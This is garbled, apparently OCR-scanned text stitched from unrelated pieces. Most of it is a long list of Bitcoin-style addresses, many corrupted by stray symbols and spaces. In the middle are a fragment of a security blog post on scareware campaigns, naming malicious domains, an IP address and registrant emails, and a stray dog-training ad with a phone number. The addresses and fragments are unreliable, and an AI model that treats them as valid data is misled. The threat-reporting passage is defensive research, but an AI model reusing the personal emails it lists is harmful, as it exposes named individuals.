12bn3LOWmNe9xqYrphf3VT6B4gd4aJZ74F 
12bQFW5C1JcB2QxW1WWR2t6msCX1Lvp5FR 
12BTLjaCN8W3m48ZT9KN375Udx6pZRqlA6 
12BuHEuvsxakKsnVxUqi9p5HRiraQPzzEdXx 
12c3fnMcdZA4GXvcn5SD49WUAqtDp9rdjY 
12CbVMxWmG934HFQrSJc5VtKzJPVSLMvD 
12CC9QvFHONYWFYYS3maCfMEedjcFztCbf 
12CCkGKGz4jDdFcDqzotoy9J9BtYUGkoHw 
12CjwjM6iIQKYYdDACUxxujR7PXXHbqxBoH 
12CSGaBgV2wLCfrHaUYb9c1lqquaKZhWVLn 
12CVqjuLfa8bxE8GazRvBdTF2eJJ9tqPj4 
12Czkbx8EyxXvw3n8uzqBsdDVWH2HGYmPQ 
12d2U9ExXczuLhX7CQhqRq7Qi2wCxXEo7ut 
12D567vQ9er2GruAd8VvdmyZXQB5Cnu9Wo 
12d5EtFKVSmgfBEMMtVZQ1QEqEmASkW8PW 
12dTv7rwyo5NzXRPriFS5m5seNv43CzWvy 
12dxStdBWTdiRpCYDu6vbUygemxiJLhqmf 
12dYPYZYea6wd5vLyJGCmcrWQdZ1kyffR5 
12E1X1NN6td5rMGxbi8Qu95V85HMVjdnCu 
12e5Lb5i3m3vEwmJMNegyHSv1FeEusYjUA 
12eAUN4MKXkcfg8bfUQztzqSePPindkvo4 
12EbcaUq7pbbrHReESLU9EF 75HAFjFCRaj 
12ebZCSFvPvkfaHo5E3rQgkQMBvniccPK2 
12EcxFEe9wV1k5adwHF3PqC446hpEe2AUM 
12EDPfSwb8B9j8tVrnX79tgolTfYp6gwy5 
12eh)Gw3iyPVN35W47Sxuy5Rfju7cpCMZa 
12eJfeiZE88imfQ5VojT94ZNH4Fwdtyvz1 
12EnJqtQ82Rgef5hM17evqNCTjDJG4ZSeU 
12EPHagaxXP7AupvMJrCRavYgbQUyEEbNv 
12ePRqvoRkY5biVFPyp6beExAaWiaZWYhm 
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12eUR5SrHWreuWoszK3eSW3sMTvkRMcM35 
12exGxjehGRW2DLfSdWcdalUTzsCz4CTYD 
12ezbzfMUrmZQHtjPQVimevnB2N7vVUiI7A 
12FdRqJ46XQDPpQbQPjk2PLLV1GGzPecyU 
12FeS5SoyiZ389E28xjFljymdCyscQ6UFS 
12FgnUoxUrNArYN5L4Ryh6EAcrGNYsUbiD 
12Fir7 HBqaffoLKuuVstr6BFGtp7kWGCQV 
12FQZBebt7nQgA7VubbGHQZKbUTjk9Avny 
12Fu5yYkojQGV791ttX27CgLjxxhq4RyBo 
12fxtpC7 v9MuNDukACDSHHYUKxamWTQRsK 
12fY4hzZdj8RGcghzJqrDeLUHvLTbiIMd6C 
12G63G3queMBrXxtFHeVjaJsESF3nNQATdKR 
12G8Yx421ebY5N6cZh8D1uiIMFU2mMN3GGTn 
12gKEZUDqm2nJFqAGInwHUg2V7ENnDKr5N 
12GM2RDDWLCpAAzLDNadnvegBgzBiHMHun 
12GScjxdpNNcoCGhBoJ7qm4VUGzbDFinPd 
12gZcVcwhYD9dabcF8UakAMHQbH37ZkdKr 
12h15LYGNg69ERJbB42Pzs3G5sx7mjGdq7 
12h6RZhVb9bgeFHwn1Xgj8rXMmwpxdiTsH 
12HFpi9TYn6dMwXzKVcX4B8iXR1LRYBRtU 
12Hjq6mzUdxa3vUEQyPnEKKxneV24p7Qk2 
12Hjqf164PFriV59QSNPFSHNGQ41zvMQZR 
12hjy3wGbiSqY6pVsTMsiNQGX2p6raiEF7 
12hKrcrcE5sYXJ1Z7MiYZL9QTJ1t12jsZu 
12HLYhH3LKiIRZEZbk3XZnGMbduV85BgUbGo 
12hHPKHYPvTrjW 7Jwi7SUCijDstCoayPjLm 
12HrNoYikdf6mTcuXUj3fheByMJfmZ8KyQ 
12hSEE3DvDVBXcynvKzdXiqH1GZQfwYgs1 
12hV278qMEMKFPcg4Jn7ZKLZtyHqe4Rb3A 
12HWuunflmia9Y8QrgpeMU5tcT8UBVDETS 
12ifYaYwvLxMiLRz7VaZgPjKTLmcEi2mMFK 
12iPgG35UBX9E6ru4Ph7YnE4T3focu69tr 
12iXWLxjuxre4sbMUtXaseFDU5hff64FLQ 
12iY6mnQQ6f2FITdzo6pC37fowyngqavGYP 
12iysBMfBjLKm85UtY29FZvsposP5]J5MBw 
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12J48akNg2xSPaNlw4qaCY5JbFFivifoEB 
12Jf3qhaJaDt8wkFKiTqzyrgRvVE6nCYLs 
12JnDES6bPduSUwroPGWZgUBmZxrTzFysU 
12JJRAXVx5LGTEXi3FKEwbW3LpiPHFcL2H 
12JnrEpdg6Rb6BXW5dEPnv1FSZgdqyZH4P 
12JojLremH3kijC7HDJMU9HPywJkb8TuyX 
12jPFFyA11QHK2C9ioONVudMN5gAWrT3GVc 
12jQEYPivSG9dqyx6JoMHuK8FhAssPmSLq 
12jwpV1kKXEQbJTab2R9N473k2nkdXzBt3Q 
12jWVeTJ4AnHDnQYoDXDRhMsvHWRHpVggN 
12)XM2QhRFYKHmrmUByUJNub3xXZ5Wmé6go} 
12KB6V13iX9iIfNZKd6CdKJQYaEnCLqPa4k 
12KEGoGCuxJQft5JnkupbLvtYqsraxBgGt 
12kgp69XXHpsu7tDyBRWEMQqE6hs9dnWZV 
12kjexTBAExJeXxmB3zxiyGEEFLxQk75q3 
12KRM1AWFjrY3NUe4SBg9AraDDPbYGYzc3 
12kSeg4cLqziwwAvDntq85rQ3kRtkKaXBy6 
12kvNyG7jABWMTrCbVqphNuiBJ5ixX4PM9f 
12kVZMMhb7DGfj2vfiqgl Sm6dUgxygMRFAC 
12KXG7xgpBram9UhSeKRs4CrCmSoUZdvSY 
12KylaDHWf£JrT2HfFTNtXMc9CtDYHsv1s6c 
12kYguqdbM5sXn5mzzAp2ZLrjf1DtMuhXU 
12LaBFKwXLciXcZMLnMHmn16FR5bksDop2 
12LbU3UYrqpKFA9veevVf9qJsxXqcm7VaRjx 
12LNMH8CwarzcmEqfAMe93eYFUMboXyRnc 
12LSHMHYic1T4SKh7F2eg3MQ5ZzxXXRa]vq 
12LyHDCEGkxdVGyofSintzKhXeNikXCMFt 
12MehxSAwvCFpdEHmrFmZAhSn9hYQTdPSg 
12mg8pCVmZaDK3HS5thoJtHgFiP69WcL5n2 
12mMHjsFkk6ye2NW1itlioAMwbUDdbPsFzA 
12mihWQ9yC4GjvRnZaaqbDVMQPqVoomGLt 
12MJCcqwMpEHSj5hQip55X9yLsisc58n7v 
12mP1rBBdQNU6M2FmCx5WQpawsbzGH5AL4 
12MqZQkfZNyBf3NjrCtZB8xS61pXDXjFNp 
12mTmksY8CrqoozaUz2LBmcreWAEzXgCzU 
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12mVcgkTeTRVEH6au4PTABsyMSb2mF4kEb 
12MWUeGsrQvSwoRLkpNdSTYaD9V1b4Xf98 
12Mx36BwNxs6TP2LMU6HWryspo6FCznBZn 
12my4FMvRMhCnoarsPrhDzVBv3h4dE1jHH 
12N3YvshYQUEMicM97x9mDLXKAuF ZjPtcp 
L2N9K5TTZXkWvwyP1lcWoZTkyBJxWHwapj5 
1L2NiYaAX4M36e2yXiUn|XmAJPTGL6PHawb 
12nkP9tRsabG2wiAXVdXK6aZakcB5Zyhcp 
12nkRSvz5g77z5tnHrjNmkmgmqG8Gdv1x6 
12nQhDDvhiWxgiahMVKCMQpWU7uVqCjJCRc 
12nvXpSk3Qro9E6TZrEQgSdFLwuadvMRJP 
12nwRKbNvx4r2brgYaJQFyYWaVBFYy7a6v 
12NXkm4YjpM6AfjCioNggalxNABLe3GBUU 
12Nyrdi7ZhCYrEZhacoqcyX8cxH36KsqrN 
12nyrVcuaBCsLWGV2jFmMLB75aTPTUjzzDo 
1202R5GfrMAZMWpBfS8r9jVzP2e8u79W6T 
120Ck3Dv5tTtDe7L4MLrzziTneB8XaHBM] 
120cW5X3LdMCr1VdSFNYA9x4GdCqVmXSjH 
120uRQF5KsseKWbwbLG2WABMZQXd]J53EsxX 
120ZMbxcYi8yVSaj2gqJiWj8vDNgbK6VkY 
12p2CcaDixL2FCMBzxzfMhPwufMohDbTmH 
12p5bDhLzJjyLthfY9X8FwZxnebTxdFVPm 
12p5EhVoY9xX7VRd5jMP304knsNMs1TQ7R 
12p9xXdtdQNnxP9fK1LWb1ARayPpdZNyGGQ 
12PbGeULdif6fCoUDYKMJoTGZhhvx68xcc 
12pc75GMaCFZopL2My8vesT]3G8aRNFigi 
12PEiX8JrY¥mMpMRL6jkTK38pcDng1l4NwVHB 
12PGV9uv66SuCkeHDiGAXkefzWfTnWuQ3Z 
12pn9wcwQia3EK7aws61tz7EEAfzZ9Kyxvg 
12prsX7FBWFbGPuihypmdZufrpMxWGF65n 
12pScWoLTF73AMHjYzmpSHRiTdbR4FHJiH 
12pthE2rZqMm84BsHEMoaBctfigGhtv95i 
12PwCGXsrCN6mSMmWhjgwLalmzCsVFCzef 
12pWDmT2xA6MTr76QDZED7aCAiRaQes5Au 
12pz4XT3bMKaQEcogsy12ZFnWBYbgR3ipw 
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iwantsweepviruses .com 
personalfoldertest .com 


[6]Sampled scareware once again phones back to the thebigben .cn - Email: chu-thi- 
huong@giang.com and june-crossover .com - 78.46.201.90 Email: doru@sattenis.com, 
with more scareware parked there - purchuase-premium-software .com - Email: nagap- 
pan.krishnan@persons.us; livepaymentssystem .com - Email: mikel2haro@yahoo.com; 
secure.livepaymentssystem .com - Email: mikel2haro@yahoo.com; purchuasepremiumpro- 
tection .com - Email: Malcolm@partypants.com. 


K-9 Reflections 


Dog training 913-351-1725 
Cincinnati, Ohio vay ‘ 


Evasion techniques are in again in place, however, this time they end up in a [7]Russian 
Business Network deja vu moment from 2008. In March, 2008, ZDNet Asia and TorrentReactor 
followed by a large number of other high profile, high pagerank sites started activing as 
intermediaries to scareware campaigns, among the first such abuse of legitimate sites for 
scareware serving purposes. 
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12QbsaJc6tsy4AifuiV2 7oWSyf2JAt)3Hj 
12QChbURjYqP6cibTGLxT4QjxVKD7p1bPj 
12qd7VjRZMppF6NTTQgZfjAhkPnKk9nhUf 
12qDMyr96Z7YaVuT172sFNVCYUVW2jX1BE 
12Quexr6wiohQ62PDwLuGxAJrqWwafQYP2X 
12QUVVdvithVup3waT2trqY5fim2hyT3C1 
12qX4JgyGv5usHGJaGoixf36ZE39jzzyPG 
12r8xqZhKxMxZNd741J4VLZ9SoOEXtUAV3i 
12rBrKkyAmM9ERrXcnV6N3qdyd4mfsNCQ9nn 
12RM4RNU4Vawo7ytvAx841a5CcmTdzhEB9 
12rmBnpRpkGdA4doxvuFTaM4dwUDZKydxq 
12Rn1YeBYRB2HNpcgUD4BGH39PC8pNPTta 
12Ro82Eh7HiZbk8McYEsC82qe4p53e79LV 
12Rq32tkAxZdFm1EFfqzpDhH5xxY7dSHgN 
12rR1TpKhqGTkAwbpbqbjJgLZ4YUX2FqAwU 
12RUeE8aQuRHINgbFqq3t9OXTyfLrTg4PYs 
12rVJzxcloRRjAy 7ici3HE9ZVKrKRzZuFfH 
12S3vcymMvZ4i6L2mqjUe5mLGCFVta4nP3 
12ScKMigtha7 7W6jq)jwHUF4LLW31zrCWVp 
12Sff3KQbbCxiVUQGVWZmjsQycwMy4NMhi1r 
12SfsswWdXL1LFhTaVh8pKWcgtDRkumWmL 
12SyW5rzxVaJ6h4vAWMG1SxWLbxSX8aRa3 
12t4V6pLTWRbrZnGq/7f8iYu721KjNxZG4f 
12tDZPpzsx8mjxAa7Csgqm4eYez9FUKZCQ 
12tERoGd8ra5SAv8HsjL1HoJdotK4WhfSt 
12TMkKdQAJHn5WGugtPzZWtZZUr6nAGF7E5 
12tmur4KxzabPhe5iXDW5KE9KHDtAFPihd 
12TNuUWYpMgonrPokKn8L6iBMbcvjJBgPLVU 
12TvpQmaqboF phQp87WxXvJAvcxfaaqbkKkM 
12U7NGvLE2suAduvZ5EtikKTAPmCmNUApmV 
12U99qqENdBwkK3W75LH67L5DcanRreBEoC 
12u9cQ6jbkA39SDPSKu9Q2RxsEzJiCGowK 
12UCKjsbJP3TGkeX8bsfWuJ3YYo0a76G93c 
12UDMHN«xgiPdaciiXJCPXXN91hUvbGvUd6 
12UJgTp4msKCK41d9xCv5Bo37p1liRQbLgh 
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12UJp5L64RkKAF3RLS7C4EEVKZ9YQ4xYbsH 
12Ukeqot5wZ9ktWMJ2scjhJn8LBNs6QDsR 
12UMBmbetV1RtUxS3SxGgrcnuQUMDdQozo 
12UNnFJ7wPsCgy48f5yHtcP4PHaCmcFuT9 
12Uz7CaY34ysuMeRdctEzsyoKqyyCjda62 
12V7SwKYzcLcQ52kw1V9pRVeKvVcZWQdf6 
12VD3AnzxZ873ASA5Pj5k7p1wftooyqfRF 
12VdK9nnvffSWG6CGd9MB3y4rt2x3LPHbd 
12vEcKxRuiQ8x8XJaUumZF1sz6JQNql1KGW 
12VgqrBp2RnQcFpZXv7zcEDfsdthx3Sjkv 
12Vkffqg8BVufN1noGWpvyZNC7Fd5dnUVP2 
12VTVB7R5MHKuck7K89FxzFeLw4zmrxr3K 
1L2vVHjKYYKAxjjp5bEthDBNa9m9vAqr68y 
12vVS5bgextiFu664FoLdf7LanToVBXKst 
12VxgXcrWT55qLsLAp6J1Hbw1d2WCzZV3c 
12VYewq2PycdYWBNKFaQXpsMDd5QEqNRhE 
12W1iXnhQKLULEMZWEFGhPvTpegbL8sVqy 
12W2myKo55QePx2DR4hiYToyqtEY4ieN 7k 
12wMfcGvsG9PoFtLt7NFUrNB4CSnSEaAQj 
12WMZBt1boPV5sMKknDeYSe8EximnGuV41 
12Wt33uYByQpUY3R5ZCUWWT9OTFBSLm1Dar 
12x32b20nnti6x5gMWskpu2YdDXUqywCCW 
12x6airud5a53kiFfQsnGNYLCaB4RCvEr6 
12xbAVH2v5aWyiz8LyCbgUGn3BHenCXGUT 
12xdb1Zt8rDJF|BY2GiSmv4Nhgrq3EwTk7 
12XgoyE4BPET4Uuj9XF Xti7Y8zBjZewbXP 
12xJDf] SeVVzZ1j9MQMGfvUdWEeCPhF3qAr 
12xJRv6g5jUcs1QLxuXr8XMgFSXfjrfj KL 
12XNqmssJHnhGaynpxHCpfPwaEyVmidNE} 
12xvE44rsAC5 7JqAw4c8yFyFeWFoT5ZQYW 
12XVTU25 7wtqptk5Zx6K6iyx4voUEinPdD 
12XXSUBPgZm2jrSyL2jhLeySmV7fm9alLv 
12y3NDag3Tzxju4U30bxyJ6QHiaJwFSRju 
12Y4XiCKz9y4vgQrw3kKYCeZLoLFcNLyo} 
12Y5x52WBNTMpYd2wQ2ENkEZHWyaUHOQfoi 
24984 


12y6q7LK52k1juHi8)66HUJbCHyfifv3cU 
12YB80tUqTCPSzYhgVNJpDxWa7W56ixZXf 
12ynw8g5pq5yoHe7eqHLFSSwhAMywXS23p 
12YqE73h2UprohBt37drUkaC2xfdr6GPEt 
12yrdhpkZoaVp33vtYgPS8diYe6WYceu9U 
12YujWobB4qSanghb6NHFNsx4stgoZZul1E 
12YvBpeTPQJxnxn7btE56BpxKb1Ag64rjt 
12YWHNUSKt241MHAKXG8RtATcDRiDTkApc 
12ywJLBBv3efDCTEMb4T4BFa4TkGDt2eEt 
12yY9ZruThLiwgq2PY2gr6tNfD4CUS2jnZD 
12Z22GGbvhLG1W9coivfWntSVbdq2FWMLGT 
12Z5dAHP7GJjZsSYVHHVsmwjqQLREwHZaix 
12Zc74n7PVYRdZCDH/7jrmeEMvPmxX6zRNvf 
12ZDXtFGsKssDsZZYK4yqZujDjKX1LkKDGt 
12zfLsKVctreQV1byjnc5Nupn7al51UM5u 
12ZGM2ybAAFPSmuRHq5 TewBK7 YeNoFSAEb 
12ZjXAUHJf9nzT79GLBCVahxDJFgv6Bsgj 
12z0b8R4sUyE6kmdv3N6PZHE9VjRWx7mBj 
12zTecGqBj3x46LDDJHpoWFrADFqe4fzuS 
12ZuDv1p6q48K7Ftbsfxz282cDGwvVtw6o 
12ZVJKZ1WEyQF7RKHK5i6fYtM18CrrK7J3 
12ZxmYU2irl1EMHBaTvo78QanW99akTZ7Lc 
1311PgkoLQL8sM6Aj4By7s5yZ84Bp6p7cE 
1314vNsxXf9rLio75EZw2W7YD5ACn9DMAph 
131A5tv5EW4exi3P9Zzmp7USYVV8TN8PJ3 
131B7qgaZntQ225vHoLn1Vaikvw8SSL9gfE 
131h5K86zsgcvbR34PmY99dgyVhUvMexpz 
131kiPVLESTZpQYh6CYJQmEkcf63AVezuz 
131mMcUdz7DR6jjcSyVKqZmPdsESKTq2kC 
131luZsUJqmnhVKvRNbfywZbhqFanBseHHo 
132BfzB9qRttUTS4Ld13wITNnhFWP4AkKgeg 
132dwQoxN1B7e9j37qnErDipkSLFUt7gMf 
132G6torpX7yuTqFnWXGAoxhs1WUeh7gjw 
132KSGCQVWpyZ2UtjjfFbcwvvNtYW2anXx7 
132q5uCtz5K2Lhb9zZQtss6zPMXfPYV49Gs 
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1335eC6ZPkz2UtFCIHNCD2zrER4WMRvnjt 
1337ZwsNxDRrcFvWXvpQLeTMLijaa4Wpf2 
133B5s7QppQeFWxV4feeCj DMMgRuCeKpEN 
133L7KJoW2X2spGLPvgPp4h43E4sci68rH 
134hrN4Z1T964PZUNW1jTPSG8q4j63AbFB 
134VoMhiEwfKC5EYGc9XCebD1rmLdRxXrYV 
134ZT5x6hP8AjZwxnUT59NMbkqisJdMm2u 
1351A8K3Ua6j8NAmFj44fTb4YiPGJMH4Jv 
1351CrofoYGX7RVJNHUwUHS8eQZPELCV27 
135ncK6iR4xTgABNrvy5cwqzmgcrYY25Zk 
135SJHfB8apCPVnb4Q8nD5EHXg5Y2AJ8b8 
135Z9tnZuUCQbMHVvF ly6TvpSVF346GyzqfD 
1361A5UaissQkG77syxFCvSRAghhug6xQX 
1364cWSNbw3K21H2twizzMoLoQlgbghBrx 
1364WGgTRonBagj2VVwGwjEEod4YD]q7qy 
136EUfPjyV1nR79tXztKJUHLgT5iUKb4MS 
136qHSTidpWa62jCxfscHKKG8fwfXrjsky 
136tcPeBEDaRYm657p5maqmpCQEmPMZyfw 
136xY4zmbdAWsfUGLon6uYYpgpXtEDLokd 
137CBKSkg8qACjCLqwopQEK4xMim230Mza 
137CPsz8N8GTkjSLMm5fnfXWNthvihyNJ8 
137gJPoBcynaqLUEQjZaz]3fMpLKdmWm8o 
137N9gaWwogyAIc8Uuayxj89ugUtbAINw7b 
137NdY5QmsaDmVa5CZHwkGeQYEqn1xxXidH 
137s3Wdmm2BTjwwtvWGLHsZtppPYptbpxs 
137U5UiZjAto5TeZdCojMpxJYKEqoZXgKT 
138ds]pMk6c17WN8LzvG1CX8ZSER4FMviq 
138ne6NARCNYmMrDjA5UxwdTo5qyXzeoCg 
138sErQSypGdTkPv4iZbCe4nxhtziQQnNT 
1396QKJD9nN2G4Whkpj64NogMDYFDT5uMwi 
139EEJ9dFt4jJoMQ4UWUcXmSyQnyJoKTna 
139HY8NbKRnwQtBvmDC4yYw3TrUtmVGMSv 
139k2YuKY58drKw8YD1NerJecgCKYC1LERX 
1390NKG7Q6d8i2kKR5D6bEZqnpm2Zcecizne 


139TRHFUxXsgosTVt7hoUB3wvShuYjMuc9 
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139UjPETMBeRB7Um92pB2ejXPEhA7mp7J4 
139uWjrMgUEmSVdNLS7cSpzbVAkKU7WQS1e 
13a21iIW9mqD3GQgH3EkWXVWg4x6GqgXehd 
13A2RA2EQKmuAecbmSugkB5NFXQaCKSP 7} 
13a2ygdBCUxdkThXmqSX3uwjRn5KBF1lybj 
13AdDXwChjsXvNRqY8m6Bj4roG4nL9nxT}j 
13AGXggA3Efpc2q1Vz1d1la3Sv4LgCSRuBF 
13AjLvUSikgz6iLLGGAsNLpVuypJWRsMM4 
13akKqUwSm8Qi6n3MBxQSnSFUexX8CRtszpc 
13AmtkLwHmQZShGgac8h3]RuRyjgicngwk 
13AN5a4fANL14U65wfMGF7Yo2FN3LhV4hc 
13asPxf¥Vm7ZaVCFF1Fux7k5jQMEJ6rmMhE 
13atzKL3zxntZzjsAvXABpG3w15LrTWiTF 
13AU4N73kfWLPISM8VHM56HgxxuDK4fmrm 
13AWSjrTRUFXpNsbosJSDcavZVTv4RCF3e 
13B4CXh3R7901PpRkXbFV9NKDpDBCUZL1Q 
13b4EwWchtdEFh9DyBDstqCC2LrusWgYws 
13B6iocmME51GjeSeu3z88hkmuZS5K7iNU7 
13bHVfGRKNdP7gWtDEm3MRoDAXiXCxGKoN 
13BieaYQGZDZjCtGuCo8xXfRF6éacPUeWoy 
13bMWAcFPB4tuRvte42yiyeittRSKfaJac 
13bosyohqeYXGHobpeRG4MUTvgHiRgPMKh 
13BtfVbVtj IMQ6AAORVS8rnjphWwSYnUgtM 
13bUAWNxuS2Ni6f7pQDejxNnhVBZokYPxg 
13bZRWQNarfNodMY9AvEcRejiopj4JRQM4E 
13c163ULPij 7M8iyDv52APhZjsvQLrqvWZ 
13C9wsrrKuAasC4nG8yohS2bNbF5mf7x7p 
13CB4gkRtww3y4n23TksaGupWgB9]YyXsa 
13cebLAcYD9CzFokfRGedkbBxHHj2JfKzm 
13CGQF1JtomAVoZDwrogc72Ytxhi9WBsYh 
13CrFMACsu3UR7UUFWegAUcWFdFDbJe6M9 
13CRsD6k2cBu41i37kYuyREfGofG5V5xdS 
13CSwccfjRS49ZxGHmXDwkKntffTEeRBNZnd 
13CyijV1kA7yuXaGF1tMBXN1MqnHFPUUFp 
13cZxHpV7qn2BU5jdHKgBaibmR8c4dVWuy 
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13d8njds2tKXU7UTP4UvPvJ2xysei3PnYY 
13dAkszwyPHQY1VINY5kaFzZzZMUXytgT4eg 
13DBz3ewtMoshjz5ZzC8wLqbR51EJA6M5v 
13dd4iH1vjGKSwrsaS64kDpbTXmK8MMtZ7 
13DeUexzQ9TlawgqsorxnTza2mzMFxXUAGVt 
13djraDxWvkLBAvJ1Szfd1J3hSdkHYBeet 
13dpT6gUN8s1kWd7YABze8jwbqrcMcNhoF 
13dZ65j7U4Wx9T59bKQrHz5dJDnM2Kphdb 
13e9S5AS1e1ZZXW6V87sHSyyrm9gDcNEHN 
13EBxfkKxCfqB6w7 1bhd7twSBmEVR48qQof 
13echkfV54pw7fxNlgkQmg5yV8FC4xx1l6T 
13ECPutho5o0kQsif2DceNdnYp4BsmouKDd 
13eeYLjh6z8XP8ZDuM5NzbDYAFWtMzbxtF 
13egkJBwjdqEETfKFeJyK79VMST5ZRc2W6 
13EIRBWG58yy12AX4QBjkz5s5GMpCTC9Pq 
13e0KmMeak1u80NGYxUw66fNVVuUbhG82U 
1L3EVINXFNVSXgPG6rngYmmMxwUidDk3sPB 
13Ex82QgzzcjCk2ic2NxTSqNihvkwhZkD5 
13fbQ3WeYtTwFYcQuvmYaZMMH4Sn7iFmMUo 
13fGaUyiHqmp 7nEW9JSPFyBW73ccwnHze4 
13FgkrHAJ773tDjaKlxbruaRHMnA3qUWct 
13FpGQNkCBuenSGJshriJ9axXJuZHZgVyig 
13fQQSCoaxXJcMZE2ARMGVeqoMPnh73M56p 
13fTg2mevSg64miyhwa7oeGEtaqrwplvZi 
13FTroVcnepM6VKVQvrK7RfMgPnqYYn292 
13fUcRictbUDVfHqLrUBMssnnZyYr8bkGi 
13fUK6LJUCNUfFnaRpF7uwGVVRfGmEaTg7 
13FvDta5YyWybjLqSCLpRQWe35FPxozMgt 
13fZBWZwewW85BgokKuvzofzcKdcT35ozt 
13g2Ebc9grmMju3kdj2jEqUTgfQ78SD6pA 
13G9L7VicDBN4NcZtNqlLq7WQ2yQLavV84s7 
13gajygotE3ptlkraJ4Qqis7Q9eRYxWeNB 
13gD768HPBccnkRS5S8qgHCqqqzkEEuFTWV 
13gMG7ChTVbE807yGiiKaVmhg6a9SpB TwC 
13gqnyMfn4gSVqkK4FgEA5EKpobuoYfSgZz 
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13H3Q5p2jfwUVRxfGPsDZ1vYqxhgMsHhuu 
13HDHGhHHkKmMQNDqo8YDEalTWognivkd9pvvZ 
13HFPEfFTNZAP1j9JiXFSNuoeuE8Y1Sgcv 
13HjWG8SgisBWxi2pjygVomabBePpfebWQ 
13hM16pwXk361FXL7sZUGnBDFp8VKQueg1 
13HpwfVHaWEy5DvWX7Wp9aYx6FTobFAaQ1 
13huZEFFaCX7c89zQoaRT3YRIrwebZD1lqga 
13hVdpxD7TFxcU2HRwdScrGwBxU/7uJnarg 
13Hy8mzsxXKo7MLZA2W9p5qnA6SjwUChijv 
13hyPoUKJ6enrxjEHCXAN9dPvtHW9A6wXT 
13hyWF5gW7JKVC4eUTZUtR9IFZ59M36WDdiji 
13HZxflwDxyy2ChbBj9ENg9kZJwxMQuYAZ 
13hzySkobw5GM8DGtJ6FQmajFyhwT9Vf2Mm 
13i17Ytksd3JZRSBbsx7QVuQ2aL7waSmRHr 
13ikPvZ9Q6XvbFDoOASXFXa2GB luehiQwt;j 
13iNMUUY99TXLUMRUQggB7qXpiWPHtaEeh 
13iPG2JdveZtTGKmu15W3RVm1CoH1f6Eqw 
13ixvSRjcahBufANHrR9sSFUj|GIgegNdTHm 
13J)1lgbDW4KzGChedx4VdKhuGiqZZvH4n2W 
13j6Rkaj4cUHngXT 7Lyfrg85Zo085mpG3xi 
13j8bMtqyLuid79ZKPNyYFBxWxgYzfeLXxt 
13)9HdMqZfpExvmDPeYbiQugdPmqTULN8F 
13JEF1Tfe8S5zyBws2N6qG7fcpbELdLg4f 
13jGMeQQ84Su09jCgXJstYaoxaN49giE5H 
13Jq5Jcp1Wt8spUcbTs7aAVdZPUnrQYpC5 
13jsojLhna3qusdgeSFkCzoF6LdUWU1Mvi 
13J)ZK4GJZpSfY 7RaLbTKrdMtQf63qTYjuT 
13KARJbX2s6NEBZsVLQXwskRBvx6U1Amp9 
13KE5MRXDeu2CK7Nt3LkzmxYym4J2HEX5W 
13KhLSzm3Dvk3uh2VCpRSCAnJ9SjgP6HeEQ 
13kJUSOEEMLW42fcW2VTZLAZ3xeUvjKq9T 
13kLVUxY6H35xaxZ8LRHyLAqdhUHGREdkK 
13kRyzbyPtQ8Pte3zp9890L1nw1QZ7Bn1X 
13KuxAFq7cnwzYNLw7fiLHwMdp6xtWcGGr 
13L4E3MYvioziGdDP1sQiknPtkKtPhDx1HC 
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13LgdNCHkoSbbc1JQBGpiMNkcEadhmZwcw 
13LMePoqNVpCrA15xBeYu8te9SJVS5VHnt 
13LMuFqJ4T9cSkaP6gzB4HjtoGVnnCobWi 
13LoCAdvQJnspeScKATfr6YelwJgGqz4Y8 
13LVQGM2z2Pa6AzyFjyp22phqiNEvKHy6s 
13M5TMeBFRokREanxZJU4uUUZXgicv7ND} 
13Mbb8T7DsAVMgNbTH4ivUdWYXYCTZLk9k 
13MGFFCN4mkR7Z7W7ubNjDCZE8iPod2A3i 
13mJPBSGW9B4JBHSjTKreySccUQ91A4x4Y 
13MKEDWccHtQ9aBUL7WtS1Q6AEyxnD1xFH 
13MUnPadsBp11YF48Q32WFq8aUTZTEp688 
13mUqm1CixB1lgRLctwHLw46MWk7J87MgPe 
13N11ExTmigUbLVnMU6Y1Z9vVJo7cLpT6v1 
13N5Jwxoz5fXLL1oXPR4fbBN9USJWyyZCT 
13nbu7cc6bwMaW1W8mky7ZS1KiaE5KeyUxy 
13Nc5VCYQP3hDEN8z6FAqPotPYyz3eKKaE 
13nDcNxYZY5FSCWCnFi4tPNG4JNtLsFdyH 
13NFHEveCU96tnfemt6k5TxWPZ3Lb8B5eb 
13NgHYBsh8HR4w4DRhHFoct2QxXPnc3dxfd 
13NJMGYVWINLVrKCSTGLmj5YTHcvokfCx] 
13nJqUBgH3hAGUFwCxpofclc6vRV2q4ZW3 
13nLnUNn5dmpC9QKA4EBZutEuus9TCnXDN 
13NpL3mAXoFtt98fGU5cYMkMskK743WiD7 
13NrgYhtjgMtPpGdtPpxV4WX3S7azfeD48 
13NTLP4a6mFftFbm1w1SBNsgeyDNDsi3PF 
13nucb19idcLc7WNhXzjWrjjHm7WnWBwiF 
13Numosywt5k9HLy1U2PG76aZEBYUwW1h8X 
13nzmaDGTUU5GP9UVwmbrGrVQPupXbTARn 
1304wLBWjqWYyx5wwmk79njMG78uGn3Kex 
1306NWP8NR92Q7rQxhoaW9eG52LCgqBtsH 
130ASPRtxGUszXu38HvkKDRmpDBmztR7JY}J 
130eKSdgBQiSC]xwNngiM9rCbNs3jTucRu 
130VihgpFub36QqFQad27m1c7bZwP8gx92 
13p1ZcjCQS3T7S4NZvWaa5Pc3XMUA2hiIMC 
13P53d8qdEr4CSMYRsQssdSybvXeQjpcPG 
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13pcduxkaQQPx68euFm2KmVAWWUKGSWFJK 
13piCnRXfWXb9fdgRTtbt3b9n6d9taSnRs 
13Pk4GaCZHNCffp2vJ3NhK53r0o0U3M9DzD 
13PNmyEWR3roj5nyojhhfiuZKs95Xw5X6h 
13Pq6fugHzprSjEqvZKjVXtSpk9njAhaKb 
13pQDE2mutWKSWMcWv5fV3QSUWzCErxqYm 
13pS5EaLxJPoYcwrXoDGVMo9WAF425tUZK 
13pSEJctTaEVBBfox3SUVVvBm5eS28K7bC 
13pvE4QNHgyZGe9rn9d2fwUosc2GTIsdABR 
13Q7pTWXMmrJprehRNS7GbTs8o0RT DsovjU 
13Q7ruVZWAKQOoLDrj8S6NFhy35DVdQcZdB 
13Qf84FjLPdYXiIRR8XbC62S8EskyVZETen 
13Qg2FLwsJQgXyNGwE9dGKiG7RaQnuDgTm 
13qhV2YHfWWUU4pWvRPIJqg5SvY7CW44MFS 
13qnVq1LSJuUCBExWSmCvUW6kyE8nSaPDnY 
13Qp2pZbb8DVLegAncRL9Qsk8PhdximncS 
13QPwxnKBnQan4XZSFDtbMHfaoNciMGHpP 
13RiPJ3xkLobyNV7Eq9Hoo6Hi8zxEKxjBzr 
